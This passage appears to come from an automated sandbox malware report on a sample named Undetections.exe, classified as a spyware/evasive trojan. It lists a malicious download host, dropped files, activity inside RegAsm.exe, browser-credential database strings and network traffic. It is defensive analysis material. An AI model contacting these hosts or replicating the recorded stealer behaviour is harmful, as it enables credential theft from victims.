                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/hwids.txtd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/z-Closing.txt
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: EHCBAAAF.4.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: EHCBAAAF.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/xe
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siticoneframework.com/
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siticoneframework.com/pricing.htmlFSoftware
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknown HTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49741 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 104.102.129.112:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 95.217.212.139:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00411BF0 memset, GetDesktopWindow, GetWindowRect, GetDC, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt, GlobalFix, GlobalSize, SelectObject, DeleteObject, DeleteObject, ReleaseDC, CloseWindow
                          Source: C:\Users\user\Desktop\Undetections.exe Code function: 0_2_0F0FE2D8 GetKeyState, GetKeyState, GetKeyState, GetKeyState, GetKeyState

                          System Summary

                          Source: spoofer.exe.0.dr, RemoteObjects.cs Large array initialization: RemoteObjects: array initializer size 209920
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_69DD62C0 PR_dtoa, PR_GetCurrentThread, strlen, NtFlushVirtualMemory, PR_GetCurrentThread, memcpy, memcpy
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CF05704_2_69CF0570
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C964D04_2_69C964D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CEA4D04_2_69CEA4D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D7A4804_2_69D7A480
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C684604_2_69C68460
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB44204_2_69CB4420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CDA4304_2_69CDA430
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C7A7D04_2_69C7A7D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CD07004_2_69CD0700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C746D04_2_69C746D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CAE6E04_2_69CAE6E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CEE6E04_2_69CEE6E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CAC6504_2_69CAC650
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE99C04_2_69CE99C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C899D04_2_69C899D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB59F04_2_69CB59F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE79F04_2_69CE79F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D219904_2_69D21990
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C619804_2_69C61980
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CCF9604_2_69CCF960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D0D9604_2_69D0D960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D9F9004_2_69D9F900
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D059204_2_69D05920
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2F8F04_2_69D2F8F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C5D8E04_2_69C5D8E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C838E04_2_69C838E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69DAB8F04_2_69DAB8F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CAD8104_2_69CAD810
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C97BF04_2_69C97BF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D35B904_2_69D35B90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C41B804_2_69C41B80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D19BB04_2_69D19BB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CA9BA04_2_69CA9BA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2FB604_2_69D2FB60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C9BB204_2_69C9BB20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C51AE04_2_69C51AE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2DAB04_2_69D2DAB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69DD9A504_2_69DD9A50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C8FA104_2_69C8FA10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D4DA304_2_69D4DA30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D21DC04_2_69D21DC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C43D804_2_69C43D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D99D904_2_69D99D90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB3D004_2_69CB3D00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D8DCD04_2_69D8DCD0
Source: Joe Sandbox View, Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View, Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 004022A0 appears 286 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 69C73620 appears 76 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 69D89F30 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 69C79B10 appears 78 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 69CAC5E0 appears 34 times
Source: Undetections.exe, 00000000.00000002.4105841921.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameResourceAssembly.dllD vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameResourceAssembly.dllD vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameFontAwesome.Sharp.dllD vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4082392228.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4100226337.0000000003941000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameFontAwesome.Sharp.dllD vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C88000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameBeyound.exeF vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4107042182.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameFontAwesome.Sharp.dllD vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameResourceAssembly.dllD vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameFontAwesome.Sharp.dllD vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameSiticone.UI.dll8 vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameSiticone.UI.dll8 vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameResourceAssembly.dllD vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameSiticone.UI.dll8 vs Undetections.exe
Source: Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameSiticone.UI.dll8 vs Undetections.exe
Source: C:\Users\user\Desktop\Undetections.exe, Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, dwrite.dll, msvcp140_clr0400.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, textshaping.dll, windowscodecs.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe, Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, dbghelp.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncryptsslp.dll, wbemcomn.dll, amsi.dll, userenv.dll, version.dll, uxtheme.dll, sxs.dll, ntmarta.dll, mozglue.dll, wsock32.dll, vcruntime140.dll, msvcp140.dll, windowscodecs.dll
Source: Undetections.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: spoofer.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@6/28@4/4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4_2_69CB0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4_2_00410980 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4_2_004110C0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear
Source: C:\Users\user\Desktop\Undetections.exe, File created: C:\Users\user\AppData\Roaming\spoofer.zip
Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: Undetections.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Undetections.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Undetections.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Undetections.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr, Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr, Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr, Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr, Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr, Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr, Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr, Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.dr, Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr, Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr, Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr, Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.dr, Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr, Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr, Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr, Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr, Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.dr, Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: KEBGHCBAEGDHIDGCBAEC.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
